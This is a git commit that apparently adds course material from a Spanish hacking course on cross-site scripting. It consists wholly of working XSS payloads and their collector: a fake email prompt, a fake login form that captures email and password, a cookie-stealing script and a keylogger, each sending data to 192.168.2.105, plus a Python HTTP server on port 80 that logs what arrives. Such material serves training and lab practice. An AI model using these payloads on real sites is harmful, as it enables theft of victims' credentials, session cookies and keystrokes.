Add Tema 6 - CrossSite Scripting XSS

2024-02-13 01:11:01 +01:00
parent db98611323
commit 440b8c8a84
6 changed files with 114 additions and 0 deletions
--- a/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/email.js
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/email.js
@@ -0,0 +1,10 @@
+<script>
+    var email = prompt("Ingresa tu correo electrónico para visualizar el post", "example@example.com");
+
+    if (email == null || email == ""){
+        alert("Es necesario ingresar un correo electrónico válido");
+    } else {
+        fetch('http://192.168.2.105/?email=' + email);
+    }
+
+</script>
--- a/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/email_pass.js
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/email_pass.js
@@ -0,0 +1,19 @@
+<div id="formContainer"></div>
+
+<script>
+  var email;
+  var password;
+  var form = '<form>' +
+    'Email: <input type="email" id="email" required>' +
+    ' Contraseña: <input type="password" id="password" required>' +
+    '<input type="button" onclick="submitForm()" value="Submit">' +
+    '</form>';
+
+  document.getElementById("formContainer").innerHTML = form;
+
+  function submitForm(){
+    email = document.getElementById("email").value;
+    password = document.getElementById("password").value;
+    fetch("http://192.168.2.105/?email=" + email + "&password=" + password);
+  }
+</script>
--- a/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/hijacking_cookie.js
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/hijacking_cookie.js
@@ -0,0 +1,5 @@
+<script>
+	var request = new XMLHttpRequest();
+	request.open('GET', 'http://192.168.2.105/?cookie=' + document.cookie);
+	request.send();
+</script>
--- a/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/keylogger.js
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/keylogger.js
@@ -0,0 +1,10 @@
+<script>
+	var k = "";
+	document.onkeypress = function(e){
+		e = e || window.event;
+		k += e.key;
+		var i = new Image();
+		i.src = "http://192.168.2.105/" + encodeURIComponent(k);
+	};
+
+</script>
--- a/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/server_keylogger.py
+++ b/Introduccion-hacking-hack4u/tema_6_owasp/02_crosssite_scripting_XSS/server_keylogger.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+
+import signal
+import sys
+
+from urllib.parse import unquote
+from http.server import BaseHTTPRequestHandler, HTTPServer
+
+
+def signal_handler(sig, frame):
+    print('Servidor detenido...')
+    sys.exit(0)
+
+
+signal.signal(signal.SIGINT, signal_handler)
+
+
+class RequestHandler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        decoded_path = unquote(self.path[1:])
+        print(decoded_path)
+        self.send_response(200)
+        self.end_headers()
+
+
+if __name__ == '__main__':
+    server_address = ('', 80)
+    httpd = HTTPServer(server_address, RequestHandler)
+    print('Servidor iniciado en el puerto 80...')
+    httpd.serve_forever()